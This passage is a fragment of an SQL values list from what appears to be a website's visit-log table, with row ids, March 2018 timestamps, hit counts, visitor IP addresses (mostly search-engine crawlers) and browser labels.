(215247,1520209882,1,1,0,0,'54.36.148.218','other'),(215248,1520210487,1,1,0,0,'54.36.148.207','other'),(215249,1520210589,2,2,0,0,'216.244.66.237','other'),(215250,1520210663,1,1,0,0,'40.77.167.69','other'),(215251,1520211013,1,1,0,0,'54.36.148.36','other'),(215252,1520211014,1,1,0,0,'80.57.36.26','other'),(215253,1520211368,1,1,0,0,'54.36.148.221','other'),(215254,1520211442,1,1,0,0,'54.36.149.39','other'),(215255,1520211797,1,1,0,0,'54.36.149.33','other'),(215256,1520211825,1,1,0,0,'54.36.148.111','other'),(215257,1520212027,1,1,0,0,'54.36.148.29','other'),(215258,1520212647,1,1,0,0,'54.36.148.195','other'),(215259,1520212711,1,1,0,0,'54.36.148.251','other'),(215260,1520212787,1,1,0,0,'216.244.66.237','other'),(215261,1520213348,1,1,0,0,'66.249.66.156','chrome'),(215262,1520213355,1,1,0,0,'66.249.66.76','chrome'),(215263,1520213592,1,1,0,0,'54.36.148.47','other'),(215264,1520213804,1,1,0,0,'54.36.148.64','other'),(215265,1520214061,1,1,0,0,'54.36.148.90','other'),(215266,1520214098,1,1,0,0,'216.244.66.237','other'),(215267,1520214230,1,1,0,0,'54.36.148.73','other'),(215268,1520215101,1,1,0,0,'54.36.148.63','other'),(215269,1520215529,1,0,1,0,'66.249.66.155',''),(215270,1520215792,1,1,0,0,'216.244.66.237','other'),(215271,1520216494,1,1,0,0,'54.36.149.77','other'),(215272,1520216755,1,1,0,0,'54.36.148.142','other'),(215273,1520216988,1,1,0,0,'54.36.148.123','other'),(215274,1520217097,1,1,0,0,'54.36.148.198','other'),(215275,1520217314,1,1,0,0,'54.36.148.202','other'),(215276,1520217575,2,0,2,0,'66.249.66.157',''),(215277,1520217683,1,0,1,0,'66.249.66.75',''),(215278,1520217736,1,1,0,0,'54.36.148.35','other'),(215279,1520217830,2,2,0,0,'66.249.66.156','chrome'),(215280,1520217835,1,1,0,0,'66.249.66.75','chrome'),(215281,1520218007,1,1,0,0,'8.29.198.25','other'),(215282,1520218103,1,1,0,0,'54.36.148.169','other'),(215283,1520218337,1,1,0,0,'207.46.13.165','other'),(215284,1520218387,2,2,0,0,'66.249.66.74','chrome'),(215285,1520218538,2,2,0,0,'54.36.148.116','other'),(215286,1520218550,1,1,0,0,'54.36.148.87','other'),(215287,1520218553,1,1,0,0,'54.36.148.16','other'),(215288,1520218577,1,1,0,0,'54.36.148.86','other'),(215289,1520218763,1,1,0,0,'54.36.149.40','other'),(215290,1520218896,1,1,0,0,'54.36.148.252','other'),(215291,1520219123,1,1,0,0,'37.9.113.182','other'),(215292,1520219389,1,1,0,0,'54.36.148.105','other'),(215293,1520219594,1,1,0,0,'54.36.149.39','other'),(215294,1520219644,1,1,0,0,'54.36.148.89','other'),(215295,1520220004,1,1,0,0,'54.36.148.193','other'),(215296,1520220135,1,1,0,0,'54.36.149.76','other'),(215297,1520220440,1,1,0,0,'54.36.148.252','other'),(215298,1520220469,1,1,0,0,'54.36.149.18','other'),(215299,1520220562,1,1,0,0,'54.36.148.182','other'),(215300,1520220637,2,2,0,0,'77.111.244.36','chrome'),(215301,1520220657,1,1,0,0,'54.36.148.105','other'),(215302,1520220752,1,1,0,0,'54.36.148.221','other'),(215303,1520220856,1,1,0,0,'46.161.9.39','firefox'),(215304,1520220859,1,1,0,0,'178.154.171.88','other'),(215305,1520221058,3,3,0,0,'216.244.66.237','other'),(215306,1520221124,1,1,0,0,'54.36.148.255','other'),(215307,1520221643,1,1,0,0,'5.9.147.133','other'),(215308,1520221802,1,1,0,0,'54.36.148.156','other'),(215309,1520221889,1,1,0,0,'54.36.148.101','other'),(215310,1520222111,1,1,0,0,'54.36.149.37','other'),(215311,1520222264,46,46,0,0,'94.199.151.22','other'),(215312,1520222540,1,1,0,0,'54.36.148.96','other'),(215313,1520222728,1,1,0,0,'54.36.148.180','other'),(215314,1520222855,1,1,0,0,'40.77.167.109','other'),(215315,1520222857,2,2,0,0,'216.244.66.237','other'),(215316,1520223060,1,1,0,0,'66.249.66.156','chrome'),(215317,1520223062,1,1,0,0,'66.249.66.76','chrome'),(215318,1520223098,1,1,0,0,'54.36.149.39','other'),(215319,1520223366,1,1,0,0,'54.36.148.18','other'),(215320,1520223741,1,1,0,0,'54.36.149.13','other'),(215321,1520223799,1,1,0,0,'141.8.142.74','other'),(215322,1520223882,1,1,0,0,'54.36.148.94','other'),(215323,1520224111,1,1,0,0,'54.36.149.17','other'),(215324,1520225137,1,1,0,0,'54.36.148.174','other'),(215325,1520225379,1,1,0,0,'54.36.148.243','other'),(215326,1520225422,1,1,0,0,'54.36.148.211','other'),(215327,1520225488,1,1,0,0,'54.36.148.51','other'),(215328,1520225605,1,1,0,0,'54.36.148.38','other'),(215329,1520225664,1,1,0,0,'91.196.178.133','chrome'),(215330,1520225715,1,1,0,0,'54.36.148.213','other'),(215331,1520225820,1,1,0,0,'54.36.149.50','other'),(215332,1520226014,1,1,0,0,'37.140.189.234','chrome'),(215333,1520226047,1,0,1,0,'66.249.66.156',''),(215334,1520226117,1,0,1,0,'66.249.66.75',''),(215335,1520226157,1,1,0,0,'54.36.148.12','other'),(215336,1520226746,1,1,0,0,'54.36.148.151','other'),(215337,1520226798,1,1,0,0,'54.36.148.247','other'),(215338,1520226986,1,1,0,0,'54.36.149.37','other'),(215339,1520227110,1,1,0,0,'54.36.148.92','other'),(215340,1520227425,1,0,1,0,'66.249.66.155',''),(215341,1520227498,1,1,0,0,'54.36.148.93','other'),(215342,1520227627,102,102,0,0,'5.9.88.103','other'),(215343,1520227723,1,1,0,0,'54.36.148.236','other'),(215344,1520227958,1,1,0,0,'54.36.148.101','other'),(215345,1520227996,1,1,0,0,'54.36.148.150','other'),(215346,1520228117,2,1,1,0,'66.249.66.156',''),(215347,1520228125,1,1,0,0,'66.249.66.76','chrome'),(215348,1520228295,1,1,0,0,'54.36.148.18','other'),(215349,1520228331,1,1,0,0,'180.76.15.156','other'),(215350,1520228577,1,1,0,0,'54.36.148.81','other'),(215351,1520228703,1,1,0,0,'54.36.148.31','other'),(215352,1520228707,1,1,0,0,'54.36.148.156','other'),(215353,1520228755,1,1,0,0,'107.167.105.171','other'),(215354,1520228834,1,1,0,0,'8.29.198.25','other'),(215355,1520228892,1,0,1,0,'66.249.66.157',''),(215356,1520228897,1,1,0,0,'207.46.13.25','other'),(215357,1520229291,1,1,0,0,'54.36.148.238','other'),(215358,1520229308,1,1,0,0,'141.8.142.74','other'),(215359,1520229506,1,0,1,0,'66.249.66.156',''),(215360,1520229903,1,0,1,0,'66.249.66.157',''),(215361,1520229997,1,1,0,0,'54.36.148.200','other'),(215362,1520230001,1,1,0,0,'54.36.148.237','other'),(215363,1520230129,1,1,0,0,'54.36.148.211','other'),(215364,1520230132,1,1,0,0,'54.36.148.201','other'),(215365,1520230326,1,1,0,0,'91.196.178.133','chrome'),(215366,1520230334,1,1,0,0,'54.36.148.74','other'),(215367,1520230348,1,1,0,0,'95.108.244.69','chrome'),(215368,1520230466,1,1,0,0,'54.36.148.207','other'),(215369,1520230509,1,1,0,0,'54.36.149.12','other'),(215370,1520230747,1,1,0,0,'54.36.148.79','other'),(215371,1520231125,1,1,0,0,'54.36.148.125','other'),(215372,1520231355,1,1,0,0,'54.36.148.229','other'),(215373,1520231448,1,1,0,0,'66.249.66.74','chrome'),(215374,1520231722,1,1,0,0,'216.244.66.237','other'),(215375,1520232129,1,1,0,0,'54.36.149.40','other'),(215376,1520232627,1,1,0,0,'54.36.148.140','other'),(215377,1520232704,1,1,0,0,'54.36.148.87','other'),(215378,1520232711,1,1,0,0,'54.36.148.142','other'),(215379,1520232735,1,1,0,0,'66.249.66.74','chrome'),(215380,1520232777,1,1,0,0,'54.36.149.30','other'),(215381,1520233072,1,1,0,0,'54.36.148.11','other'),(215382,1520233195,1,1,0,0,'54.36.148.246','other'),(215383,1520233312,1,1,0,0,'54.36.148.100','other'),(215384,1520233339,1,0,1,0,'66.249.66.75',''),(215385,1520233491,1,1,0,0,'54.36.148.236','other'),(215386,1520233684,1,1,0,0,'66.249.66.156','chrome'),(215387,1520233689,1,1,0,0,'66.249.66.74','chrome'),(215388,1520233914,1,1,0,0,'54.36.149.8','other'),(215389,1520233943,1,1,0,0,'54.36.148.74','other'),(215390,1520233953,1,1,0,0,'91.196.178.78','chrome'),(215391,1520234169,1,1,0,0,'54.36.148.194','other'),(215392,1520234284,2,2,0,0,'91.196.178.73','chrome'),(215393,1520234373,1,1,0,0,'141.8.142.74','other'),(215394,1520234682,1,1,0,0,'54.36.148.24','other'),(215395,1520234689,1,0,1,0,'66.249.66.156',''),(215396,1520234777,1,1,0,0,'46.161.9.56','chrome'),(215397,1520234785,1,0,1,0,'74.222.14.91',''),(215398,1520235209,2,2,0,0,'195.230.119.34','chrome'),(215399,1520235241,1,1,0,0,'178.154.171.88','other'),(215400,1520235334,1,1,0,0,'54.36.148.60','other'),(215401,1520235368,2,2,0,0,'91.196.178.78','chrome'),(215402,1520235409,1,1,0,0,'54.36.148.68','other'),(215403,1520235488,1,1,0,0,'54.36.148.103','other'),(215404,1520235542,1,1,0,0,'54.36.149.81','other'),(215405,1520235824,1,1,0,0,'54.36.149.55','other'),(215406,1520235928,1,1,0,0,'37.55.151.181','chrome'),(215407,1520235971,1,1,0,0,'54.36.148.248','other'),(215408,1520236209,1,0,1,0,'66.249.66.157',''),(215409,1520236273,1,1,0,0,'54.36.148.195','other'),(215410,1520236413,2,2,0,0,'216.244.66.237','other'),(215411,1520236448,1,1,0,0,'54.36.149.84','other'),(215412,1520236450,1,1,0,0,'54.36.148.23','other'),(215413,1520236701,3,0,3,0,'66.249.66.155',''),(215414,1520236905,1,1,0,0,'54.36.148.184','other'),(215415,1520237146,1,1,0,0,'91.196.176.13','chrome'),(215416,1520237150,1,1,0,0,'54.36.148.211','other'),(215417,1520237167,1,1,0,0,'54.36.149.54','other'),(215418,1520237409,1,1,0,0,'54.36.149.33','other'),(215419,1520237733,1,1,0,0,'54.36.149.84','other'),(215420,1520237998,1,1,0,0,'54.36.148.128','other'),(215421,1520238351,1,1,0,0,'54.36.148.101','other'),(215422,1520238442,1,1,0,0,'54.36.148.89','other'),(215423,1520238463,1,1,0,0,'54.36.148.237','other'),(215424,1520238636,1,1,0,0,'54.36.148.132','other'),(215425,1520238746,1,1,0,0,'54.36.148.124','other'),(215426,1520238770,1,1,0,0,'54.36.149.93','other'),(215427,1520238785,1,1,0,0,'66.249.66.75','chrome'),(215428,1520239075,1,1,0,0,'54.36.149.40','other'),(215429,1520239265,1,1,0,0,'66.249.66.156','chrome'),(215430,1520239267,1,1,0,0,'66.249.66.76','chrome'),(215431,1520239674,1,1,0,0,'8.29.198.26','other'),(215432,1520239772,1,1,0,0,'54.36.148.166','other'),(215433,1520239774,1,1,0,0,'54.36.148.118','other'),(215434,1520240160,1,1,0,0,'54.36.148.233','other'),(215435,1520240303,1,1,0,0,'66.249.66.75','chrome'),(215436,1520240317,1,1,0,0,'66.249.66.156','chrome'),(215437,1520240417,1,1,0,0,'54.36.148.15','other'),(215438,1520240477,1,1,0,0,'195.225.147.237','chrome'),(215439,1520240523,1,1,0,0,'54.36.149.81','other'),(215440,1520240618,1,1,0,0,'54.36.148.253','other'),(215441,1520240667,1,1,0,0,'195.191.139.59','chrome'),(215442,1520240685,1,1,0,0,'54.36.149.4','other'),(215443,1520240834,1,1,0,0,'54.36.148.234','other'),(215444,1520241285,1,1,0,0,'54.36.148.185','other'),(215445,1520241288,1,1,0,0,'54.36.148.245','other'),(215446,1520241339,1,1,0,0,'194.44.17.50','firefox'),(215447,1520241462,2,2,0,0,'91.196.178.78','chrome'),(215448,1520241500,1,1,0,0,'54.36.148.187','other'),(215449,1520241782,1,1,0,0,'66.249.66.75','chrome'),(215450,1520242002,1,1,0,0,'94.179.147.128','chrome'),(215451,1520242140,1,1,0,0,'91.196.177.46','chrome'),(215452,1520242168,1,1,0,0,'54.36.149.18','other'),(215453,1520242372,1,1,0,0,'194.44.17.50','firefox'),(215454,1520242434,1,1,0,0,'91.196.178.161','chrome'),(215455,1520242442,1,1,0,0,'54.36.148.175','other'),(215456,1520242472,1,1,0,0,'46.161.9.56','chrome'),(215457,1520242545,1,1,0,0,'54.36.148.189','other'),(215458,1520242557,1,1,0,0,'54.36.148.59','other'),(215459,1520242724,1,1,0,0,'54.36.148.113','other'),(215460,1520243228,1,1,0,0,'54.36.148.46','other'),(215461,1520243234,1,1,0,0,'54.36.149.98','other'),(215462,1520243250,1,0,1,0,'66.249.66.155',''),(215463,1520243370,1,1,0,0,'194.44.17.50','firefox'),(215464,1520243453,1,1,0,0,'82.207.121.233','chrome'),(215465,1520243483,1,0,1,0,'66.249.66.157',''),(215466,1520243679,1,1,0,0,'216.244.66.237','other'),(215467,1520244035,4,4,0,0,'91.196.178.80','chrome'),(215468,1520244052,1,0,1,0,'66.249.66.76',''),(215469,1520244209,1,1,0,0,'66.249.66.74','chrome'),(215470,1520244238,2,2,0,0,'91.196.178.69','chrome'),(215471,1520244239,1,1,0,0,'54.36.148.46','other'),(215472,1520244460,1,1,0,0,'66.249.66.157','chrome'),(215473,1520244490,1,1,0,0,'54.36.149.51','other'),(215474,1520244531,1,1,0,0,'54.36.148.218','other'),(215475,1520244655,1,1,0,0,'54.36.149.31','other'),(215476,1520244686,1,1,0,0,'54.36.149.64','other'),(215477,1520244928,1,1,0,0,'216.244.66.237','other'),(215478,1520245093,1,1,0,0,'54.36.148.12','other'),(215479,1520245215,1,0,1,0,'66.249.66.75',''),(215480,1520245307,1,1,0,0,'54.36.149.103','other'),(215481,1520245376,1,1,0,0,'91.196.178.73','chrome'),(215482,1520245437,2,2,0,0,'91.196.178.80','chrome'),(215483,1520245439,1,1,0,0,'54.36.148.240','other'),(215484,1520245456,1,1,0,0,'54.36.149.70','other'),(215485,1520245584,1,1,0,0,'54.36.149.68','other'),(215486,1520245663,1,1,0,0,'54.36.149.86','other'),(215487,1520245790,1,1,0,0,'54.36.148.84','other'),(215488,1520245792,1,1,0,0,'91.196.177.46','chrome'),(215489,1520245814,1,1,0,0,'54.36.148.22','other'),(215490,1520245829,1,1,0,0,'54.36.148.45','other'),(215491,1520245960,1,1,0,0,'91.196.178.104','chrome'),(215492,1520246567,1,1,0,0,'54.36.148.89','other'),(215493,1520246860,1,1,0,0,'54.36.148.187','other'),(215494,1520247400,1,1,0,0,'54.36.149.3','other'),(215495,1520247855,1,1,0,0,'66.249.66.76','chrome'),(215496,1520247912,2,2,0,0,'91.234.28.19','firefox'),(215497,1520247914,1,1,0,0,'91.196.178.161','chrome'),(215498,1520248159,1,1,0,0,'141.8.142.74','other'),(215499,1520248398,1,1,0,0,'54.36.148.225','other'),(215500,1520248712,1,1,0,0,'54.36.148.22','other'),(215501,1520248740,1,1,0,0,'54.36.148.25','other'),(215502,1520248788,23,23,0,0,'167.114.219.41','other'),(215503,1520248821,1,1,0,0,'54.36.149.44','other'),(215504,1520248995,1,1,0,0,'54.36.148.222','other'),(215505,1520249025,1,1,0,0,'54.36.148.233','other'),(215506,1520249302,1,1,0,0,'54.36.149.26','other'),(215507,1520249376,1,0,1,0,'66.249.66.156',''),(215508,1520249424,1,1,0,0,'93.73.248.202','chrome'),(215509,1520249860,1,1,0,0,'66.249.66.155','chrome'),(215510,1520250210,1,1,0,0,'54.36.148.198','other'),(215511,1520250548,1,1,0,0,'8.29.198.27','other'),(215512,1520250597,1,1,0,0,'54.36.148.251','other'),(215513,1520250623,2,2,0,0,'78.111.190.251','chrome'),(215514,1520250795,1,1,0,0,'95.132.7.176','firefox'),(215515,1520250822,1,1,0,0,'54.36.148.235','other'),(215516,1520251109,1,1,0,0,'54.36.148.115','other'),(215517,1520251312,1,1,0,0,'217.69.133.242','other'),(215518,1520251483,1,1,0,0,'54.36.148.152','other'),(215519,1520251765,1,1,0,0,'40.77.167.109','other'),(215520,1520251780,1,1,0,0,'54.36.148.211','other'),(215521,1520251813,1,1,0,0,'66.249.66.74','chrome'),(215522,1520251974,1,1,0,0,'54.36.148.187','other'),(215523,1520252071,1,1,0,0,'95.134.97.244','chrome'),(215524,1520252124,1,1,0,0,'54.36.148.115','other'),(215525,1520252382,1,1,0,0,'54.36.149.92','other'),(215526,1520252695,1,1,0,0,'91.196.178.93','chrome'),(215527,1520252761,2,2,0,0,'91.196.178.30','chrome'),(215528,1520253012,1,0,1,0,'66.249.66.74',''),(215529,1520253350,1,1,0,0,'216.244.66.237','other'),(215530,1520253695,2,2,0,0,'78.111.190.79','chrome'),(215531,1520253723,1,1,0,0,'66.249.66.155','chrome'),(215532,1520253806,1,1,0,0,'54.36.149.83','other'),(215533,1520253872,1,1,0,0,'91.196.178.163','firefox'),(215534,1520253969,1,1,0,0,'217.69.133.226','other'),(215535,1520254092,1,0,1,0,'66.249.66.76',''),(215536,1520254117,1,1,0,0,'54.36.148.34','other'),(215537,1520254156,1,1,0,0,'217.69.136.204','other'),(215538,1520254884,1,1,0,0,'91.209.11.236','other'),(215539,1520254890,1,1,0,0,'91.196.178.80','chrome'),(215540,1520254922,1,1,0,0,'91.196.177.31','chrome'),(215541,1520254945,1,1,0,0,'54.36.148.203','other'),(215542,1520255121,1,1,0,0,'54.36.148.16','other'),(215543,1520255173,1,1,0,0,'54.36.148.87','other'),(215544,1520255227,1,1,0,0,'54.36.148.246','other'),(215545,1520255237,1,1,0,0,'54.36.148.142','other'),(215546,1520255490,1,1,0,0,'91.196.178.73','chrome'),(215547,1520255549,1,1,0,0,'54.36.148.26','other'),(215548,1520255701,1,1,0,0,'54.36.149.18','other'),(215549,1520255892,1,1,0,0,'54.36.149.88','other'),(215550,1520256042,1,1,0,0,'54.36.148.28','other'),(215551,1520256059,1,1,0,0,'54.36.149.6','other'),(215552,1520256166,2,2,0,0,'144.76.19.144','other'),(215553,1520256354,1,1,0,0,'54.36.149.67','other'),(215554,1520256476,1,1,0,0,'54.36.148.109','other'),(215555,1520256651,1,1,0,0,'54.36.148.168','other'),(215556,1520256815,1,1,0,0,'54.36.149.27','other'),(215557,1520257066,1,1,0,0,'54.36.148.196','other'),(215558,1520257183,1,1,0,0,'54.36.148.178','other'),(215559,1520257203,1,1,0,0,'91.229.121.3','chrome'),(215560,1520257207,1,1,0,0,'54.36.148.199','other'),(215561,1520257257,1,1,0,0,'66.249.66.74','chrome'),(215562,1520257377,1,1,0,0,'128.199.129.220','chrome'),(215563,1520257406,1,1,0,0,'54.36.148.241','other'),(215564,1520257435,1,1,0,0,'54.36.148.70','other'),(215565,1520257545,1,1,0,0,'54.36.149.59','other'),(215566,1520257566,1,1,0,0,'54.36.148.98','other'),(215567,1520257695,1,1,0,0,'54.36.149.10','other'),(215568,1520257799,2,2,0,0,'91.196.178.167','chrome'),(215569,1520257866,1,1,0,0,'54.36.148.190','other'),(215570,1520257948,1,1,0,0,'87.250.224.46','other'),(215571,1520257972,1,1,0,0,'54.36.149.2','other'),(215572,1520257992,1,1,0,0,'46.211.121.188','chrome'),(215573,1520258054,1,1,0,0,'54.36.148.249','other'),(215574,1520258079,1,1,0,0,'54.36.149.34','other'),(215575,1520258197,1,1,0,0,'95.134.97.244','chrome'),(215576,1520258210,1,0,1,0,'66.249.66.156',''),(215577,1520258212,1,1,0,0,'54.36.149.35','other'),(215578,1520258390,1,1,0,0,'54.36.148.73','other'),(215579,1520258470,1,1,0,0,'54.36.148.64','other'),(215580,1520258537,1,1,0,0,'54.36.148.176','other'),(215581,1520258623,1,1,0,0,'54.36.148.219','other'),(215582,1520258663,1,1,0,0,'37.55.144.133','firefox'),(215583,1520258798,1,1,0,0,'54.36.148.115','other'),(215584,1520258887,2,2,0,0,'91.196.178.80','chrome'),(215585,1520258938,1,1,0,0,'66.249.66.157','chrome'),(215586,1520258957,1,1,0,0,'217.69.136.210','other'),(215587,1520259103,1,1,0,0,'91.124.62.247','chrome'),(215588,1520259322,1,1,0,0,'207.46.13.170','other'),(215589,1520259350,1,1,0,0,'54.36.148.191','other'),(215590,1520259490,1,1,0,0,'54.36.148.245','other'),(215591,1520259504,1,1,0,0,'217.69.136.207','other'),(215592,1520259516,1,1,0,0,'125.209.235.184','other'),(215593,1520259604,1,1,0,0,'141.8.132.19','other'),(215594,1520259619,1,1,0,0,'54.36.149.99','other'),(215595,1520259757,1,1,0,0,'141.8.142.74','other'),(215596,1520259799,1,1,0,0,'54.36.148.42','other'),(215597,1520259817,1,1,0,0,'54.36.148.125','other'),(215598,1520259849,1,1,0,0,'54.36.148.85','other'),(215599,1520259951,1,1,0,0,'54.36.149.90','other'),(215600,1520259961,1,1,0,0,'54.36.149.8','other'),(215601,1520260100,1,1,0,0,'95.134.97.244','chrome'),(215602,1520260112,1,1,0,0,'54.36.148.230','other'),(215603,1520260416,1,0,1,0,'66.249.66.155',''),(215604,1520260591,1,1,0,0,'54.36.148.111','other'),(215605,1520260732,1,1,0,0,'54.36.148.105','other'),(215606,1520260791,1,1,0,0,'54.36.148.103','other'),(215607,1520260910,1,1,0,0,'91.196.178.135','firefox'),(215608,1520261215,1,1,0,0,'54.36.149.27','other'),(215609,1520261275,1,1,0,0,'54.36.148.118','other'),(215610,1520261401,1,1,0,0,'8.29.198.27','other'),(215611,1520261722,1,1,0,0,'66.249.66.75','chrome'),(215612,1520261758,1,1,0,0,'54.36.148.166','other'),(215613,1520262062,1,1,0,0,'207.46.13.173','other'),(215614,1520262249,1,0,1,0,'66.249.66.76',''),(215615,1520262483,1,1,0,0,'66.249.66.76','chrome'),(215616,1520262484,1,1,0,0,'54.36.148.89','other'),(215617,1520262607,1,1,0,0,'54.36.148.232','other'),(215618,1520262609,1,1,0,0,'54.36.148.155','other'),(215619,1520262736,2,2,0,0,'91.196.177.46','chrome'),(215620,1520262776,1,1,0,0,'46.211.121.208','chrome'),(215621,1520262820,2,2,0,0,'213.111.82.159','chrome'),(215622,1520263007,1,1,0,0,'178.154.171.88','other'),(215623,1520263069,1,1,0,0,'54.36.148.133','other'),(215624,1520263168,1,1,0,0,'54.36.148.107','other'),(215625,1520263510,1,1,0,0,'188.230.43.254','other'),(215626,1520263721,1,1,0,0,'54.36.148.220','other'),(215627,1520263722,1,1,0,0,'54.36.149.61','other'),(215628,1520264087,1,1,0,0,'54.36.148.188','other'),(215629,1520264384,1,1,0,0,'66.249.66.156','chrome'),(215630,1520264495,1,1,0,0,'54.36.148.72','other'),(215631,1520264619,1,1,0,0,'54.36.148.73','other'),(215632,1520264628,1,1,0,0,'54.36.148.127','other'),(215633,1520264910,2,2,0,0,'92.113.1.15','chrome'),(215634,1520264951,1,1,0,0,'54.36.149.86','other'),(215635,1520264970,1,1,0,0,'178.154.171.88','other'),(215636,1520265175,1,1,0,0,'54.36.148.231','other'),(215637,1520265180,1,1,0,0,'216.244.66.237','other'),(215638,1520265395,2,2,0,0,'54.36.148.82','other'),(215639,1520265571,1,1,0,0,'54.36.148.62','other'),(215640,1520265577,1,1,0,0,'54.36.148.202','other'),(215641,1520265617,1,1,0,0,'54.36.148.255','other'),(215642,1520265720,1,1,0,0,'54.36.148.65','other'),(215643,1520265909,1,1,0,0,'54.36.148.20','other'),(215644,1520265910,1,1,0,0,'188.230.43.254','other'),(215645,1520266053,1,1,0,0,'54.36.148.11','other'),(215646,1520266400,1,1,0,0,'54.36.148.180','other'),(215647,1520266664,1,1,0,0,'54.36.148.15','other'),(215648,1520266697,1,0,1,0,'66.249.66.156',''),(215649,1520266784,1,1,0,0,'54.36.149.13','other'),(215650,1520266929,1,1,0,0,'54.36.149.87','other'),(215651,1520267256,1,1,0,0,'91.196.178.80','firefox'),(215652,1520267334,1,1,0,0,'54.36.149.56','other'),(215653,1520267387,1,1,0,0,'217.69.133.84','other'),(215654,1520267625,1,1,0,0,'54.36.148.211','other'),(215655,1520267789,1,1,0,0,'141.8.142.74','other'),(215656,1520267902,1,1,0,0,'54.36.148.45','other'),(215657,1520267937,1,1,0,0,'66.249.66.74','chrome'),(215658,1520268259,1,1,0,0,'54.36.148.54','other'),(215659,1520268314,1,1,0,0,'188.230.43.254','other'),(215660,1520268412,1,1,0,0,'54.36.148.99','other'),(215661,1520268441,1,1,0,0,'54.36.148.21','other'),(215662,1520268496,1,1,0,0,'54.36.148.76','other'),(215663,1520268563,1,1,0,0,'207.46.13.173','other'),(215664,1520268863,1,1,0,0,'54.36.149.19','other'),(215665,1520268885,1,1,0,0,'157.55.39.36','other'),(215666,1520269054,1,1,0,0,'54.36.148.227','other'),(215667,1520269058,1,1,0,0,'54.36.149.6','other'),(215668,1520269387,1,0,1,0,'66.249.66.76',''),(215669,1520269435,1,1,0,0,'54.36.148.54','other'),(215670,1520269457,1,1,0,0,'192.162.35.25','chrome'),(215671,1520269583,1,1,0,0,'54.36.149.14','other'),(215672,1520269638,1,1,0,0,'66.249.66.157','chrome'),(215673,1520269880,1,1,0,0,'54.36.148.47','other'),(215674,1520269958,1,1,0,0,'141.8.142.74','other'),(215675,1520270183,1,1,0,0,'54.36.148.197','other'),(215676,1520270471,1,1,0,0,'54.36.148.238','other'),(215677,1520270589,1,1,0,0,'54.36.148.123','other'),(215678,1520270709,1,1,0,0,'188.230.43.254','other'),(215679,1520270749,1,1,0,0,'54.36.148.42','other'),(215680,1520270839,1,1,0,0,'54.36.148.196','other'),(215681,1520270980,1,0,1,0,'66.249.66.156',''),(215682,1520271026,1,1,0,0,'217.69.133.18','other'),(215683,1520271050,1,1,0,0,'216.244.66.237','other'),(215684,1520271204,1,1,0,0,'54.36.148.115','other'),(215685,1520271559,1,1,0,0,'66.249.66.75','chrome'),(215686,1520271608,1,1,0,0,'54.36.149.69','other'),(215687,1520271614,1,1,0,0,'54.36.148.253','other'),(215688,1520271686,1,1,0,0,'54.36.148.229','other'),(215689,1520271699,1,1,0,0,'92.113.2.112','firefox'),(215690,1520271789,1,1,0,0,'54.36.148.103','other'),(215691,1520272225,1,1,0,0,'54.36.149.32','other'),(215692,1520272244,1,1,0,0,'8.29.198.25','other'),(215693,1520272276,1,1,0,0,'54.36.149.3','other'),(215694,1520272353,1,1,0,0,'101.199.112.50','chrome'),(215695,1520272401,1,1,0,0,'106.120.162.111','chrome'),(215696,1520272411,1,1,0,0,'106.120.162.108','chrome'),(215697,1520272629,1,1,0,0,'217.69.136.208','other'),(215698,1520272642,1,1,0,0,'54.36.148.163','other'),(215699,1520272664,1,0,1,0,'66.249.66.156',''),(215700,1520272672,1,1,0,0,'87.250.224.46','other'),(215701,1520273107,1,1,0,0,'188.230.43.254','other'),(215702,1520273381,2,2,0,0,'66.249.66.157','chrome'),(215703,1520273467,1,1,0,0,'54.36.149.13','other'),(215704,1520273576,1,1,0,0,'54.36.149.65','other'),(215705,1520273603,1,1,0,0,'54.36.148.78','other'),(215706,1520273669,1,1,0,0,'54.36.148.147','other'),(215707,1520273800,1,1,0,0,'54.36.148.198','other'),(215708,1520274001,1,1,0,0,'54.36.148.119','other'),(215709,1520274259,2,2,0,0,'91.196.178.129','chrome'),(215710,1520274403,1,1,0,0,'54.36.148.205','other'),(215711,1520274517,1,1,0,0,'217.69.133.59','other'),(215712,1520274521,1,1,0,0,'54.36.149.63','other'),(215713,1520274524,1,1,0,0,'54.36.149.76','other'),(215714,1520274552,1,1,0,0,'217.69.133.193','other'),(215715,1520274582,1,1,0,0,'54.36.148.132','other'),(215716,1520275126,1,1,0,0,'54.36.149.78','other'),(215717,1520275207,1,1,0,0,'178.154.171.88','other'),(215718,1520275528,1,1,0,0,'54.36.148.204','other'),(215719,1520275552,1,1,0,0,'54.36.149.15','other'),(215720,1520275637,1,1,0,0,'54.36.149.56','other'),(215721,1520275848,1,1,0,0,'54.36.148.37','other'),(215722,1520275962,1,1,0,0,'141.8.142.74','other'),(215723,1520276033,1,1,0,0,'54.36.148.28','other'),(215724,1520276513,1,1,0,0,'54.36.148.62','other'),(215725,1520276526,1,1,0,0,'66.102.9.40','chrome'),(215726,1520276541,1,0,1,0,'66.249.66.157',''),(215727,1520276770,1,1,0,0,'178.154.171.88','other'),(215728,1520276816,1,1,0,0,'54.36.148.216','other'),(215729,1520276858,1,1,0,0,'54.36.148.210','other'),(215730,1520276886,1,1,0,0,'66.249.66.75','chrome'),(215731,1520277271,1,1,0,0,'141.8.142.74','other'),(215732,1520277501,1,1,0,0,'54.36.148.143','other'),(215733,1520277578,1,0,1,0,'66.249.66.157',''),(215734,1520277592,1,1,0,0,'54.36.149.16','other'),(215735,1520277661,13,13,0,0,'23.237.4.26','other'),(215736,1520278032,1,1,0,0,'216.244.66.237','other'),(215737,1520278078,2,2,0,0,'91.196.178.1','chrome'),(215738,1520278320,1,1,0,0,'54.36.148.239','other'),(215739,1520278417,1,1,0,0,'91.196.178.162','chrome'),(215740,1520278463,1,1,0,0,'54.36.148.115','other'),(215741,1520278488,1,1,0,0,'54.36.148.254','other'),(215742,1520278583,1,1,0,0,'217.69.136.206','other'),(215743,1520278658,1,0,1,0,'66.249.66.157',''),(215744,1520278691,1,1,0,0,'54.36.148.199','other'),(215745,1520278721,1,0,1,0,'66.249.66.74',''),(215746,1520278747,1,1,0,0,'54.36.149.84','other'),(215747,1520278795,1,1,0,0,'54.36.148.22','other'),(215748,1520278823,1,1,0,0,'54.36.148.30','other'),(215749,1520278944,1,1,0,0,'54.36.148.212','other'),(215750,1520278956,1,1,0,0,'54.36.148.40','other'),(215751,1520279134,1,1,0,0,'66.249.66.156','chrome'),(215752,1520279505,1,1,0,0,'217.69.133.230','other'),(215753,1520279591,1,0,1,0,'66.249.66.75',''),(215754,1520279593,1,1,0,0,'54.36.148.99','other'),(215755,1520279675,1,1,0,0,'54.36.149.61','other'),(215756,1520279677,1,1,0,0,'217.69.133.69','other'),(215757,1520280498,1,1,0,0,'178.154.171.88','other'),(215758,1520280579,1,